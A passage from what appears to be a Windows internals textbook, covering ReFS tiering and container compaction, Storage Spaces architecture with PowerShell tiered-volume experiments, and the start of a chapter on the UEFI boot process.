table, as shown in Figure 11-92. The rows of this table are composed by keys
that store the ID and the type of the container. Based on the type of container
(which could also be a compacted or compressed container), the row’s data is
different. For noncompacted containers (details about ReFS compaction are
available in the next section), the row’s data is a data structure that contains
the mapping of the cluster range addressed by the container. This provides to
ReFS a virtual LCN-to-real LCN namespace mapping.
Figure 11-92 The container table provides a virtual LCN-to-real LCN
indirection layer.
The container table is important: all the data managed by ReFS and
Minstore needs to pass through the container table (with only small
exceptions), so ReFS maintains multiple copies of this vital table. To perform
an I/O on a block, ReFS must first look up the location of the extent’s
container to find the real location of the data. This is achieved through the
extent table, which contains target virtual LCN of the cluster range in the
data section of its rows. The container ID is derived from the LCN, through a
mathematical relationship. The new level of indirection allows ReFS to move
the location of containers without consulting or modifying the file extent
tables.
ReFS consumes tiers produced by Storage Spaces, hardware tiered
volumes, and SMR disks. ReFS redirects small random I/Os to a portion of
the faster tiers and destages those writes in batches to the slower tiers using
sequential writes (destages happen at container granularity). Indeed, in ReFS,
the term fast tier (or flash tier) refers to the random-access zone, which might
be provided by the conventional bands of an SMR disk, or by the totality of
an SSD or NVMe device. The term slow tier (or HDD tier) refers instead to
the sequential write bands or to a rotating disk. ReFS uses different behaviors
based on the class of the underlying medium. Non-SMR disks have no
sequential requirements, so clusters can be allocated from anywhere on the
volume; SMR disks, as discussed previously, need to have strictly sequential
requirements, so ReFS never writes random data on the slow tier.
By default, all of the metadata that ReFS uses needs to stay in the fast tier;
ReFS tries to use the fast tier even when processing general write requests. In
non-SMR disks, as flash containers fill, ReFS moves containers from flash to
HDD (this means that in a continuous write workload, ReFS is continually
moving containers from flash into HDD). ReFS is also able to do the
opposite when needed—select containers from the HDD and move them into
flash to fill with subsequent writes. This feature is called container rotation
and is implemented in two stages. After the storage driver has copied the
actual data, ReFS modifies the container LCN mapping shown earlier. No
modification in any file’s extent table is needed.
Container rotation is implemented only for non-SMR disks. This is
important, because in SMR disks, the ReFS file system driver never
automatically moves data between tiers. Applications that are SMR disk–
aware and want to write data in the SMR capacity tier can use the
FSCTL_SET_REFS_FILE_STRICTLY_SEQUENTIAL control code. If an
application sends the control code on a file handle, the ReFS driver writes all
of the new data in the capacity tier of the volume.
EXPERIMENT: Witnessing SMR disk tiers
You can use the FsUtil tool, which is provided by Windows, to
query the information of an SMR disk, like the size of each tier, the
usable and free space, and so on. To do so, just run the tool in an
administrative command prompt. You can launch the command
prompt as administrator by searching for cmd in the Cortana
Search box and by selecting Run As Administrator after right-
clicking the Command Prompt label. Input the following
parameters:
Click here to view code image
fsutil volume smrInfo <VolumeDrive>
replacing the <VolumeDrive> part with the drive letter of your
SMR disk.
Furthermore, you can start a garbage collection (see the next
paragraph for details about this feature) through the following
command:
Click here to view code image
fsutil volume smrGc <VolumeDrive> Action=startfullspeed
The garbage collection can even be stopped or paused through
the relative Action parameter. You can start a more precise garbage
collection by specifying the IoGranularity parameter, which
specifies the granularity of the garbage collection I/O, and using
the start action instead of startfullspeed.
Container compaction
Container rotation has performance problems, especially when storing small
files that don’t usually fit into an entire band. Furthermore, in SMR disks,
container rotation is never executed, as we explained earlier. Recall that each
SMR band has an associated write pointer (hardware implemented), which
identifies the location for sequential writing. If the system were to write
before or after the write pointer in a non-sequential way, it would corrupt data
located in other clusters (the SMR firmware must therefore refuse such a
write).
ReFS supports two types of containers: base containers, which map a
virtual cluster’s range directly to physical space, and compacted containers,
which map a virtual container to many different base containers. To correctly
map the correspondence between the space mapped by a compacted
container and the base containers that compose it, ReFS implements an
allocation bitmap, which is stored in the rows of the global container index
table (another table, in which every row describes a single compacted
container). The bitmap has a bit set to 1 if the relative cluster is allocated;
otherwise, it’s set to 0.
Figure 11-93 shows an example of a base container (C32) that maps a
range of virtual LCNs (0x8000 to 0x8400) to real volume’s LCNs (0xB800
to 0xBC00, identified by R46). As previously discussed, the container ID of
a given virtual LCN range is derived from the starting virtual cluster number;
all the containers are virtually contiguous. In this way, ReFS never needs to
look up a container ID for a given container range. Container C32 of Figure
11-93 only has 560 clusters (0x230) contiguously allocated (out of its 1,024).
Only the free space at the end of the base container can be used by ReFS. Or,
for non-SMR disks, in case a big chunk of space located in the middle of the
base container is freed, it can be reused too. Even for non-SMR disks, the
important requirement here is that the space must be contiguous.
Figure 11-93 An example of a base container addressed by a 210 MB file.
Container C32 uses only 35 MB of its 64 MB space.
If the container becomes fragmented (because some small file extents are
eventually freed), ReFS can convert the base container into a compacted
container. This operation allows ReFS to reuse the container’s free space,
without reallocating any row in the extent table of the files that are using the
clusters described by the container itself.
ReFS provides a way to defragment containers that are fragmented. During
normal system I/O activity, there are a lot of small files or chunks of data that
need to be updated or created. As a result, containers located in the slow tier
can hold small chunks of freed clusters and can become quickly fragmented.
Container compaction is the name of the feature that generates new empty
bands in the slow tier, allowing containers to be properly defragmented.
Container compaction is executed only in the capacity tier of a tiered volume
and has been designed with two different goals:
■ Compaction is the garbage collector for SMR-disks: In SMR,
ReFS can only write data in the capacity zone in a sequential manner.
Small data can’t be singularly updated in a container located in the
slow tier. The data doesn’t reside at the location pointed by the SMR
write pointer, so any I/O of this kind can potentially corrupt other data
that belongs to the band. In that case, the data is copied in a new band.
Non-SMR disks don’t have this problem; ReFS updates data residing
in the small tier directly.
■ In non-SMR tiered volumes, compaction is the generator for
container rotation: The generated free containers can be used as
targets for forward rotation when data is moved from the fast tier to
the slow tier.
ReFS, at volume-format time, allocates some base containers from the
capacity tier just for compaction; which are called compacted reserved
containers. Compaction works by initially searching for fragmented
containers in the slow tier. ReFS reads the fragmented container in system
memory and defragments it. The defragmented data is then stored in a
compacted reserved container, located in the capacity tier, as described
above. The original container, which is addressed by the file extent table,
becomes compacted. The range that describes it becomes virtual (compaction
adds another indirection layer), pointing to virtual LCNs described by
another base container (the reserved container). At the end of the
compaction, the original physical container is marked as freed and is reused
for different purposes. It also can become a new compacted reserved
container. Because containers located in the slow tier usually become highly
fragmented in a relatively small time, compaction can generate a lot of empty
bands in the slow tier.
The clusters allocated by a compacted container can be stored in different
base containers. To properly manage such clusters in a compacted container,
which can be stored in different base containers, ReFS uses another extra
layer of indirection, which is provided by the global container index table
and by a different layout of the compacted container. Figure 11-94 shows the
same container as Figure 11-93, which has been compacted because it was
fragmented (272 of its 560 clusters have been freed). In the container table,
the row that describes a compacted container stores the mapping between the
cluster range described by the compacted container, and the virtual clusters
described by the base containers. Compacted containers support a maximum
of four different ranges (called legs). The four legs create the second
indirection layer and allow ReFS to perform the container defragmentation in
an efficient way. The allocation bitmap of the compacted container provides
the second indirection layer, too. By checking the position of the allocated
clusters (which correspond to a 1 in the bitmap), ReFS is able to correctly
map each fragmented cluster of a compacted container.
Figure 11-94 Container C32 has been compacted in base container C124
and C56.
In the example in Figure 11-94, the first bit set to 1 is at position 17, which
is 0x11 in hexadecimal. In the example, one bit corresponds to 16 clusters; in
the actual implementation, though, one bit corresponds to one cluster only.
This means that the first cluster allocated at offset 0x110 in the compacted
container C32 is stored at the virtual cluster 0x1F2E0 in the base container
C124. The free space available after the cluster at offset 0x230 in the
compacted container C32, is mapped into base container C56. The physical
container R46 has been remapped by ReFS and has become an empty
compacted reserved container, mapped by the base container C180.
In SMR disks, the process that starts the compaction is called garbage
collection. For SMR disks, an application can decide to manually start, stop,
or pause the garbage collection at any time through the
FSCTL_SET_REFS_SMR_VOLUME_GC_PARAMETERS file system
control code.
In contrast to NTFS, on non-SMR disks, the ReFS volume analysis engine
can automatically start the container compaction process. ReFS keeps track
of the free space of both the slow and fast tier and the available writable free
space of the slow tier. If the difference between the free space and the
available space exceeds a threshold, the volume analysis engine kicks off and
starts the compaction process. Furthermore, if the underlying storage is
provided by Storage Spaces, the container compaction runs periodically and
is executed by a dedicated thread.
Compression and ghosting
ReFS does not support native file system compression, but, on tiered
volumes, the file system is able to save more free containers on the slow tier
thanks to container compression. Every time ReFS performs container
compaction, it reads in memory the original data located in the fragmented
base container. At this stage, if compression is enabled, ReFS compresses the
data and finally writes it in a compressed compacted container. ReFS
supports four different compression algorithms: LZNT1, LZX, XPRESS, and
XPRESS_HUFF.
Many hierarchical storage management (HMR) software solutions support
the concept of a ghosted file. This state can be obtained for many different
reasons. For example, when the HSM migrates the user file (or some chunks
of it) to a cloud service, and the user later modifies the copy located in the
cloud through a different device, the HSM filter driver needs to keep track of
which part of the file changed and needs to set the ghosted state on each
modified file’s range. Usually HMRs keep track of the ghosted state through
their filter drivers. In ReFS, this isn’t needed because the ReFS file system
exposes a new I/O control code, FSCTL_GHOST_FILE_EXTENTS. Filter
drivers can send the IOCTL to the ReFS driver to set part of the file as
ghosted. Furthermore, they can query the file’s ranges that are in the ghosted
state through another I/O control code:
FSCTL_QUERY_GHOSTED_FILE_EXTENTS.
ReFS implements ghosted files by storing the new state information
directly in the file’s extent table, which is implemented through an embedded
table in the file record, as explained in the previous section. A filter driver
can set the ghosted state for every range of the file (which must be cluster-
aligned). When the ReFS driver intercepts a read request for an extent that is
ghosted, it returns a STATUS_GHOSTED error code to the caller, which a
filter driver can then intercept and redirect the read to the proper place (the
cloud in the previous example).
Storage Spaces
Storage Spaces is the technology that replaces dynamic disks and provides
virtualization of physical storage hardware. It has been initially designed for
large storage servers but is available even in client editions of Windows 10.
Storage Spaces also allows the user to create virtual disks composed of
different underlying physical mediums. These mediums can have different
performance characteristics.
At the time of this writing, Storage Spaces is able to work with four types
of storage devices: Nonvolatile memory express (NVMe), flash disks,
persistent memory (PM), SATA and SAS solid state drives (SSD), and
classical rotating hard-disks (HDD). NVMe is considered the faster, and
HDD is the slowest. Storage spaces was designed with four goals:
■ Performance: Spaces implements support for a built-in server-side
cache to maximize storage performance and support for tiered disks
and RAID 0 configuration.
■ Reliability: Other than span volumes (RAID 0), spaces supports
Mirror (RAID 1 and 10) and Parity (RAID 5, 6, 50, 60) configurations
when data is distributed through different physical disks or different
nodes of the cluster.
■ Flexibility: Storage spaces allows the system to create virtual disks
that can be automatically moved between a cluster’s nodes and that
can be automatically shrunk or extended based on real space
consumption.
■ Availability: Storage spaces volumes have built-in fault tolerance.
This means that if a drive, or even an entire server that is part of the
cluster, fails, spaces can redirect the I/O traffic to other working nodes
without any user intervention (and in a way). Storage spaces don’t
have a single point of failure.
Storage Spaces Direct is the evolution of the Storage Spaces technology.
Storage Spaces Direct is designed for large datacenters, where multiple
servers, which contain different slow and fast disks, are used together to
create a pool. The previous technology didn’t support clusters of servers that
weren’t attached to JBOD disk arrays; therefore, the term direct was added to
the name. All servers are connected through a fast Ethernet connection
(10GBe or 40GBe, for example). Presenting remote disks as local to the
system is made possible by two drivers—the cluster miniport driver
(Clusport.sys) and the cluster block filter driver (Clusbflt.sys)—which are
outside the scope of this chapter. All the storage physical units (local and
remote disks) are added to a storage pool, which is the main unit of
management, aggregation, and isolation, from where virtual disks can be
created.
The entire storage cluster is mapped internally by Spaces using an XML
file called BluePrint. The file is automatically generated by the Spaces GUI
and describes the entire cluster using a tree of different storage entities:
Racks, Chassis, Machines, JBODs (Just a Bunch of Disks), and Disks. These
entities compose each layer of the entire cluster. A server (machine) can be
connected to different JBODs or have different disks directly attached to it.
In this case, a JBOD is abstracted and represented only by one entity. In the
same way, multiple machines might be located on a single chassis, which
could be part of a server rack. Finally, the cluster could be made up of
multiple server racks. By using the Blueprint representation, Spaces is able to
work with all the cluster disks and redirect I/O traffic to the correct
replacement in case a fault on a disk, JBOD, or machine occurs. Spaces
Direct can tolerate a maximum of two contemporary faults.
Spaces internal architecture
One of the biggest differences between Spaces and dynamic disks is that
Spaces creates virtual disk objects, which are presented to the system as
actual disk device objects by the Spaces storage driver (Spaceport.sys).
Dynamic disks operate at a higher level: virtual volume objects are exposed
to the system (meaning that user mode applications can still access the
original disks). The volume manager is the component responsible for
creating the single volume composed of multiple dynamic volumes. The
Storage Spaces driver is a filter driver (a full filter driver rather than a
minifilter) that lies between the partition manager (Partmgr.sys) and the disk
class driver.
Storage Spaces architecture is shown in Figure 11-95 and is composed
mainly of two parts: a platform-independent library, which implements the
Spaces core, and an environment part, which is platform-dependent and links
the Spaces core to the current environment. The Environment layer provides
to Storage Spaces the basic core functionalities that are implemented in
different ways based on the platform on which they run (because storage
spaces can be used as bootable entities, the Windows boot loader and boot
manager need to know how to parse storage spaces, hence the need for both a
UEFI and Windows implementation). The core basic functionality includes
memory management routines (alloc, free, lock, unlock and so on), device
I/O routines (Control, Pnp, Read, and Write), and synchronization methods.
These functions are generally wrappers to specific system routines. For
example, the read service, on Windows platforms, is implemented by
creating an IRP of type IRP_MJ_READ and by sending it to the correct disk
driver, while, on UEFI environments, it’s implemented by using the
BLOCK_IO_PROTOCOL.
Figure 11-95 Storage Spaces architecture.
Other than the boot and Windows kernel implementation, storage spaces
must also be available during crash dumps, which is provided by the
Spacedump.sys crash dump filter driver. Storage Spaces is even available as
a user-mode library (Backspace.dll), which is compatible with legacy
Windows operating systems that need to operate with virtual disks created by
Spaces (especially the VHD file), and even as a UEFI DXE driver
(HyperSpace.efi), which can be executed by the UEFI BIOS, in cases where
even the EFI System Partition itself is present on a storage space entity.
Some new Surface devices are sold with a large solid-state disk that is
actually composed of two or more fast NVMe disks.
Spaces Core is implemented as a static library, which is platform-
independent and is imported by all of the different environment layers. Is it
composed of four layers: Core, Store, Metadata, and IO. The Core is the
highest layer and implements all the services that Spaces provides. Store is
the component that reads and writes records that belong to the cluster
database (created from the BluePrint file). Metadata interprets the binary
records read by the Store and exposes the entire cluster database through
different objects: Pool, Drive, Space, Extent, Column, Tier, and Metadata.
The IO component, which is the lowest layer, can emit I/Os to the correct
device in the cluster in the proper sequential way, thanks to data parsed by
higher layers.
Services provided by Spaces
Storage Spaces supports different disk type configurations. With Spaces, the
user can create virtual disks composed entirely of fast disks (SSD, NVMe,
and PM), slow disks, or even composed of all four supported disk types
(hybrid configuration). In case of hybrid deployments, where a mix of
different classes of devices are used, Spaces supports two features that allow
the cluster to be fast and efficient:
■ Server cache: Storage Spaces is able to hide a fast drive from the
cluster and use it as a cache for the slower drives. Spaces supports PM
disks to be used as a cache for NVMe or SSD disks, NVMe disks to
be used as cache for SSD disks, and SSD disks to be used as cache for
classical rotating HDD disks. Unlike tiered disks, the cache is
invisible to the file system that resides on the top of the virtual
volume. This means that the cache has no idea whether a file has been
accessed more recently than another file. Spaces implements a fast
cache for the virtual disk by using a log that keeps track of hot and
cold blocks. Hot blocks represent parts of files (files’ extents) that are
often accessed by the system, whereas cold blocks represent part of
files that are barely accessed. The log implements the cache as a
queue, in which the hot blocks are always at the head, and cold blocks
are at the tail. In this way, cold blocks can be deleted from the cache
if it’s full and can be maintained only on the slower storage; hot
blocks usually stay in the cache for a longer time.
■ Tiering: Spaces can create tiered disks, which are managed by ReFS
and NTFS. Whereas ReFS supports SMR disks, NTFS only supports
tiered disks provided by Spaces. The file system keeps track of the hot
and cold blocks and rotates the bands based on the file’s usage (see
the “ReFS support for tiered volumes and SMR” section earlier in this
chapter). Spaces provides to the file system driver support for
pinning, a feature that can pin a file to the fast tier and lock it in the
tier until it will be unpinned. In this case, no band rotation is ever
executed. Windows uses the pinning feature to store the new files on
the fast tier while performing an OS upgrade.
As already discussed previously, one of the main goals of Storage Spaces
is flexibility. Spaces supports the creation of virtual disks that are extensible
and consume only allocated space in the underlying cluster’s devices; this
kind of virtual disk is called thin provisioned. Unlike fixed provisioned disks,
where all of the space is allocated to the underlying storage cluster, thin
provisioned disks allocate only the space that is actually used. In this way,
it’s possible to create virtual disks that are much larger than the underlying
storage cluster. When available space gets low, a system administrator can
dynamically add disks to the cluster. Storage Spaces automatically includes
the new physical disks to the pool and redistributes the allocated blocks
between the new disks.
Storage Spaces supports thin provisioned disks through slabs. A slab is a
unit of allocation, which is similar to the ReFS container concept, but applied
to a lower-level stack: the slab is an allocation unit of a virtual disk and not a
file system concept. By default, each slab is 256 MB in size, but it can be
bigger in case the underlying storage cluster allows it (i.e., if the cluster has a
lot of available space.) Spaces core keeps track of each slab in the virtual
disk and can dynamically allocate or free slabs by using its own allocator. It’s
worth noting that each slab is a point of reliability: in mirrored and parity
configurations, the data stored in a slab is automatically replicated through
the entire cluster.
When a thin provisioned disk is created, a size still needs to be specified.
The virtual disk size will be used by the file system with the goal of correctly
formatting the new volume and creating the needed metadata. When the
volume is ready, Spaces allocates slabs only when new data is actually
written to the disk—a method called allocate-on-write. Note that the
provisioning type is not visible to the file system that resides on top of the
volume, so the file system has no idea whether the underlying disk is thin or
fixed provisioned.
Spaces gets rid of any single point of failure by making usage of mirroring
and pairing. In big storage clusters composed of multiple disks, RAID 6 is
usually employed as the parity solution. RAID 6 allows the failure of a
maximum of two underlying devices and supports seamless reconstruction of
data without any user intervention. Unfortunately, when the cluster
encounters a single (or double) point of failure, the time needed to
reconstruct the array (mean time to repair or MTTR) is high and often causes
serious performance penalties.
Spaces solves the problem by using a local reconstruction code (LCR)
algorithm, which reduces the number of reads needed to reconstruct a big
disk array, at the cost of one additional parity unit. As shown in Figure 11-
96, the LRC algorithm does so by dividing the disk array in different rows
and by adding a parity unit for each row. If a disk fails, only the other disks
of the row needs to be read. As a result, reconstruction of a failed array is
much faster and more efficient.
Figure 11-96 RAID 6 and LRC parity.
Figure 11-96 shows a comparison between the typical RAID 6 parity
implementation and the LRC implementation on a cluster composed of eight
drives. In the RAID 6 configuration, if one (or two) disk(s) fail(s), to
properly reconstruct the missing information, the other six disks need to be
read; in LRC, only the disks that belong to the same row of the failing disk
need to be read.
EXPERIMENT: Creating tiered volumes
Storage Spaces is supported natively by both server and client
editions of Windows 10. You can create tiered disks using the
graphical user interface, or you can also use Windows PowerShell.
In this experiment, you will create a virtual tiered disk, and you
will need a workstation that, other than the Windows boot disk,
also has an empty SSD and an empty classical rotating disk (HDD).
For testing purposes, you can emulate a similar configuration by
using HyperV. In that case, one virtual disk file should reside on an
SSD, whereas the other should reside on a classical rotating disk.
First, you need to open an administrative Windows PowerShell
by right-clicking the Start menu icon and selecting Windows
PowerShell (Admin). Verify that the system has already identified
the type of the installed disks:
Click here to view code image
PS C:\> Get-PhysicalDisk | FT DeviceId, FriendlyName,
UniqueID, Size, MediaType, CanPool
DeviceId FriendlyName UniqueID
Size MediaType CanPool
-------- ------------ --------
---- --------- -------
2 Samsung SSD 960 EVO 1TB eui.0025385C61B074F7
1000204886016 SSD False
0 Micron 1100 SATA 512GB 500A071516EBA521
512110190592 SSD True
1 TOSHIBA DT01ACA200 500003F9E5D69494
2000398934016 HDD True
In the preceding example, the system has already identified two
SSDs and one classical rotating hard disk. You should verify that
your empty disks have the CanPool value set to True. Otherwise, it
means that the disk contains valid partitions that need to be deleted.
If you’re testing a virtualized environment, often the system is not
able to correctly identify the media type of the underlying disk.
Click here to view code image
PS C:\> Get-PhysicalDisk | FT DeviceId, FriendlyName,
UniqueID, Size, MediaType, CanPool
DeviceId FriendlyName UniqueID
Size MediaType CanPool
-------- ------------ --------
---- --------- -------
2 Msft Virtual Disk 600224802F4EE1E6B94595687DDE774B
137438953472 Unspecified True
1 Msft Virtual Disk 60022480170766A9A808A30797285D77
1099511627776 Unspecified True
0 Msft Virtual Disk 6002248048976A586FE149B00A43FC73
274877906944 Unspecified False
In this case, you should manually specify the type of disk by
using the command Set-PhysicalDisk -UniqueId (Get-
PhysicalDisk)[<IDX>].UniqueID -MediaType <Type>, where
IDX is the row number in the previous output and MediaType is
SSD or HDD, depending on the disk type. For example:
Click here to view code image
PS C:\> Set-PhysicalDisk -UniqueId (Get-PhysicalDisk)
[0].UniqueID -MediaType SSD
PS C:\> Set-PhysicalDisk -UniqueId (Get-PhysicalDisk)
[1].UniqueID -MediaType HDD
PS C:\> Get-PhysicalDisk | FT DeviceId, FriendlyName,
UniqueID, Size, MediaType, CanPool
DeviceId FriendlyName UniqueID
Size MediaType CanPool
-------- ------------ --------
---- --------- -------
2 Msft Virtual Disk 600224802F4EE1E6B94595687DDE774B
137438953472 SSD True
1 Msft Virtual Disk 60022480170766A9A808A30797285D77
1099511627776 HDD True
0 Msft Virtual Disk 6002248048976A586FE149B00A43FC73
274877906944 Unspecified False
At this stage you need to create the Storage pool, which is going
to contain all the physical disks that are going to compose the new
virtual disk. You will then create the storage tiers. In this example,
we named the Storage Pool as DefaultPool:
Click here to view code image
PS C:\> New-StoragePool -StorageSubSystemId (Get-
StorageSubSystem).UniqueId -FriendlyName
DeafultPool -PhysicalDisks (Get-PhysicalDisk -CanPool $true)
FriendlyName OperationalStatus HealthStatus IsPrimordial
IsReadOnly Size AllocatedSize
------------ ----------------- ------------ ------------ ---
------- ---- -------------
Pool OK Healthy False
1.12 TB 512 MB
PS C:\> Get-StoragePool DefaultPool | New-StorageTier -
FriendlyName SSD -MediaType SSD
...
PS C:\> Get-StoragePool DefaultPool | New-StorageTier -
FriendlyName HDD -MediaType HDD
...
Finally, we can create the virtual tiered volume by assigning it a
name and specifying the correct size of each tier. In this example,
we create a tiered volume named TieredVirtualDisk composed of a
120-GB performance tier and a 1,000-GB capacity tier:
Click here to view code image
PS C:\> $SSD = Get-StorageTier -FriendlyName SSD
PS C:\> $HDD = Get-StorageTier -FriendlyName HDD
PS C:\> Get-StoragePool Pool | New-VirtualDisk -FriendlyName
"TieredVirtualDisk"
-ResiliencySettingName "Simple" -StorageTiers $SSD, $HDD -
StorageTierSizes 128GB, 1000GB
...
PS C:\> Get-VirtualDisk | FT FriendlyName,
OperationalStatus, HealthStatus, Size,
FootprintOnPool
FriendlyName OperationalStatus HealthStatus
Size FootprintOnPool
------------ ----------------- ------------ --
-- ---------------
TieredVirtualDisk OK Healthy
1202590842880 1203664584704
After the virtual disk is created, you need to create the partitions
and format the new volume through standard means (such as by
using the Disk Management snap-in or the Format tool). After you
complete volume formatting, you can verify whether the resulting
volume is really a tiered volume by using the fsutil.exe tool:
Click here to view code image
PS E:\> fsutil tiering regionList e:
Total Number of Regions for this volume: 2
Total Number of Regions returned by this operation: 2
Region # 0:
Tier ID: {448ABAB8-F00B-42D6-B345-C8DA68869020}
Name: TieredVirtualDisk-SSD
Offset: 0x0000000000000000
Length: 0x0000001dff000000
Region # 1:
Tier ID: {16A7BB83-CE3E-4996-8FF3-BEE98B68EBE4}
Name: TieredVirtualDisk-HDD
Offset: 0x0000001dff000000
Length: 0x000000f9ffe00000
Conclusion
Windows supports a wide variety of file system formats accessible to both
the local system and remote clients. The file system filter driver architecture
provides a clean way to extend and augment file system access, and both
NTFS and ReFS provide a reliable, secure, scalable file system format for
local file system storage. Although ReFS is a relatively new file system, and
implements some advanced features designed for big server environments,
NTFS was also updated with support for new device types and new features
(like the POSIX delete, online checkdisk, and encryption).
The cache manager provides a high-speed, intelligent mechanism for
reducing disk I/O and increasing overall system throughput. By caching on
the basis of virtual blocks, the cache manager can perform intelligent read-
ahead, including on remote, networked file systems. By relying on the global
memory manager’s mapped file primitive to access file data, the cache
manager can provide a special fast I/O mechanism to reduce the CPU time
required for read and write operations, while also leaving all matters related
to physical memory management to the Windows memory manager, thus
reducing code duplication and increasing efficiency.
Through DAX and PM disk support, storage spaces and storage spaces
direct, tiered volumes, and SMR disk compatibility, Windows continues to
be at the forefront of next-generation storage architectures designed for high
availability, reliability, performance, and cloud-level scale.
In the next chapter, we look at startup and shutdown in Windows.
CHAPTER 12
Startup and shutdown
In this chapter, we describe the steps required to boot Windows and the
options that can affect system startup. Understanding the details of the boot
process will help you diagnose problems that can arise during a boot. We
discuss the details of the new UEFI firmware, and the improvements brought
by it compared to the old historical BIOS. We present the role of the Boot
Manager, Windows Loader, NT kernel, and all the components involved in
standard boots and in the new Secure Launch process, which detects any kind
of attack on the boot sequence. Then we explain the kinds of things that can
go wrong during the boot process and how to resolve them. Finally, we
explain what occurs during an orderly system shutdown.
Boot process
In describing the Windows boot process, we start with the installation of
Windows and proceed through the execution of boot support files. Device
drivers are a crucial part of the boot process, so we explain how they control
the point in the boot process at which they load and initialize. Then we
describe how the executive subsystems initialize and how the kernel launches
the user-mode portion of Windows by starting the Session Manager process
(Smss.exe), which starts the initial two sessions (session 0 and session 1).
Along the way, we highlight the points at which various on-screen messages
appear to help you correlate the internal process with what you see when you
watch Windows boot.
The early phases of the boot process differ significantly on systems with
an Extensible Firmware Interface (EFI) versus the old systems with a BIOS
(basic input/output system). EFI is a newer standard that does away with
much of the legacy 16-bit code that BIOS systems use and allows the loading
of preboot programs and drivers to support the operating system loading
phase. EFI 2.0, which is known as Unified EFI, or UEFI, is used by the vast
majority of machine manufacturers. The next sections describe the portion of
the boot process specific to UEFI-based machines.
To support these different firmware implementations, Windows provides a
boot architecture that abstracts many of the differences away from users and
developers to provide a consistent environment and experience regardless of
the type of firmware used on the installed system.
The UEFI boot
The Windows boot process doesn’t begin when you power on your computer
or press the reset button. It begins when you install Windows on your
computer. At some point during the execution of the Windows Setup
program, the system’s primary hard disk is prepared in a way that both the
Windows Boot Manager and the UEFI firmware can understand. Before we
get into what the Windows Boot Manager code does, let’s have a quick look
at the UEFI platform interface.
The UEFI is a set of software that provides the first basic programmatic
interface to the platform. With the term platform, we refer to the
motherboard, chipset, central processing unit (CPU), and other components
that compose the machine “engine.” As Figure 12-1 shows, the UEFI
specifications provide four basic services that run in most of the available
CPU architectures (x86, ARM, and so on). We use the x86-64 architecture
for this quick introduction:
■ Power on When the platform is powered on, the UEFI Security Phase
handles the platform restart event, verifies the Pre EFI Initialization
modules’ code, and switches the processor from 16-bit real mode to
32-bit flat mode (still no paging support).
■ Platform initialization The Pre EFI Initialization (PEI) phase
initializes the CPU, the UEFI core’s code, and the chipset and finally
passes the control to the Driver Execution Environment (DXE) phase.
The DXE phase is the first code that runs entirely in full 64-bit mode.
Indeed, the last PEI module, called DXE IPL, switches the execution
mode to 64-bit long mode. This phase searches inside the firmware
volume (stored in the system SPI flash chip) and executes each
peripheral’s startup drivers (called DXE drivers). Secure Boot, an
important security feature that we talk about later in this chapter in the
“Secure Boot” section, is implemented as a UEFI DXE driver.
■ OS boot After the UEFI DXE phase ends, execution control is
handed to the Boot Device Selection (BDS) phase. This phase is
responsible for implementing the UEFI Boot Loader. The UEFI BDS
phase locates and executes the Windows UEFI Boot Manager that the
Setup program has installed.
■ Shutdown The UEFI firmware implements some runtime services
(available even to the OS) that help in powering off the platform.
Windows doesn’t normally make use of these functions (relying
instead on the ACPI interfaces).
Figure 12-1 The UEFI framework.
Describing the entire UEFI framework is beyond the scope of this book.
After the UEFI BDS phase ends, the firmware still owns the platform,
making available the following services to the OS boot loader:
■ Boot services Provide basic functionality to the boot loader and other
EFI applications, such as basic memory management,
synchronization, textual and graphical console I/O, and disk and file
I/O. Boot services implement some routines able to enumerate and
query the installed “protocols” (EFI interfaces). These kinds of
services are available only while the firmware owns the platform and
are discarded from memory after the boot loader has called the
ExitBootServices EFI runtime API.
■ Runtime services Provide date and time services, capsule update
(firmware upgrading), and methods able to access NVRAM data
(such as UEFI variables). These services are still accessible while the
operating system is fully running.
■ Platform configuration data System ACPI and SMBIOS tables are
always accessible through the UEFI framework.
The UEFI Boot Manager can read and write from computer hard disks and
understands basic file systems like FAT, FAT32, and El Torito (for booting
from a CD-ROM). The specifications require that the boot hard disk be
partitioned through the GPT (GUID partition table) scheme, which uses
GUIDs to identify different partitions and their roles in the system. The GPT
scheme overcomes all the limitations of the old MBR scheme and allows a
maximum of 128 partitions, using a 64-bit LBA addressing mode (resulting
in a huge partition size support). Each partition is identified using a unique
128-bit GUID value. Another GUID is used to identify the partition type.
While UEFI defines only three partition types, each OS vendor defines its
own partition’s GUID types. The UEFI standard requires at least one EFI
system partition, formatted with a FAT32 file system.
The Windows Setup application initializes the disk and usually creates at
least four partitions:
■ The EFI system partition, where it copies the Windows Boot Manager
(Bootmgrfw.efi), the memory test application (Memtest.efi), the
system lockdown policies (for Device Guard-enabled systems,
Winsipolicy.p7b), and the boot resource file (Bootres.dll).
■ A recovery partition, where it stores the files needed to boot the
Windows Recovery environment in case of startup problems (boot.sdi
and Winre.wim). This partition is formatted using the NTFS file
system.
■ A Windows reserved partition, which the Setup tool uses as a fast,
recoverable scratch area for storing temporary data. Furthermore,
some system tools use the Reserved partition for remapping damaged
sectors in the boot volume. (The reserved partition does not contain
any file system.)
■ A boot partition—which is the partition on which Windows is
installed and is not typically the same as the system partition—where
the boot files are located. This partition is formatted using NTFS, the
only supported file system that Windows can boot from when
installed on a fixed disk.
The Windows Setup program, after placing the Windows files on the boot
partition, copies the boot manager in the EFI system partition and hides the
boot partition content for the rest of the system. The UEFI specification
defines some global variables that can reside in NVRAM (the system’s
nonvolatile RAM) and are accessible even in the runtime phase when the OS
has gained full control of the platform (some other UEFI variables can even
reside in the system RAM). The Windows Setup program configures the
UEFI platform for booting the Windows Boot Manager through the settings
of some UEFI variables (Boot000X one, where X is a unique number,
depending on the boot load-option number, and BootOrder). When the
system reboots after setup ends, the UEFI Boot Manager is automatically
able to execute the Windows Boot Manager code.
Table 12-1 summarizes the files involved in the UEFI boot process. Figure
12-2 shows an example of a hard disk layout, which follows the GPT
partition scheme. (Files located in the Windows boot partition are stored in
the \Windows\System32 directory.)
Table 12-1 UEFI boot process components
Co
mp
on
ent
Responsibilities
L
oc
ati
on
bo
ot
mg
fw.
efi
Reads the Boot Configuration Database (BCD), if required,
presents boot menu, and allows execution of preboot
programs such as the Memory Test application
(Memtest.efi).
E
FI
sy
ste
m
pa
rti
tio
n
Wi
nlo
ad.
efi
Loads Ntoskrnl.exe and its dependencies (SiPolicy.p7b,
hvloader.dll, hvix64.exe, Hal.dll, Kdcom.dll, Ci.dll,
Clfs.sys, Pshed.dll) and bootstart device drivers.
W
in
do
ws
bo
ot
pa
rti
tio
n
Wi
nre
su
me
.efi
If resuming after a hibernation state, resumes from the
hibernation file (Hiberfil.sys) instead of typical Windows
loading.
W
in
do
ws
bo
ot
pa
rti
tio
n
